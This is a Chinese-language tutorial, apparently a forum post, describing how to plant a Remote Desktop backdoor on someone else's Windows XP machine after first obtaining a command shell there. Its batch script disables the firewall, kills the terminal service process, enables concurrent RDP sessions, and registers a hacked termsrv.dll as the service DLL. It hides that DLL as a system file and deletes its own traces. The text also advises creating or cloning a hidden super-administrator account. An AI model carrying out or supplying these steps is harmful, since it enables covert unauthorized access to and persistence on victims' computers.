一、首先准备一份XP SP2 Build 2055版本的终端服务器执行文件Termsrv.dll,这里我们把它更名为Termsrvhack.dll。没有此文件的请在下面留言。

二、编写批处理如下:
@echo off
@net stop sharedaccess
@ntsd -c q -p "pid"
@reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Winlogon /v KeepRASConnections /t REG_SZ /d 1 /f
@reg add HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
@reg add HKLM\SYSTEM\CurrentControlSet\control\terminal" "server\Licensing" "Core /v EnableConcurrentSessions /t REG_DWORD /d 00000001 /f
@reg add HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters /v serviceDll /t REG_EXPAND_SZ /d %SystemRoot%\system32\termsrvhack.dll /f
@copy c:\termsrvhack.dll c:\windows\system32\dllcache\termsrvhack.dll
@attrib +h +s +r c:\windows\system32\dllcache\termsrvhack.dll
@copy c:\termsrvhack.dll c:\windows\system32\termsrvhack.dll
@attrib +h +s +r c:\windows\system32\termsrvhack.dll
@shutdown -a
@del c:\termsrvhack.dll
@net start termservice
@del c:\3389.bat
其中"pid"要替换成TermService服务的PID号,可以用命令tasklist/svc命令得到。当然Windows 2000和以下系统是没有tasklist命令的。

三、讲解一下具体的操作过程。先要得到对方的一个CMD Shell,然后在Shell下用第三方软件打开终端服务,先不要改变默认的3389端口,不然要重起后才登陆,再建一个或克隆一个超级管理员用户。接下来把准备好的Termsrvhack.dll和上面的批处理传到对方的C盘根目录下,然后在shell下运行此批处理,提示成功!

四、最后打开远程桌面登陆器,用刚才新建的超级管理员帐户进行3389终端登陆!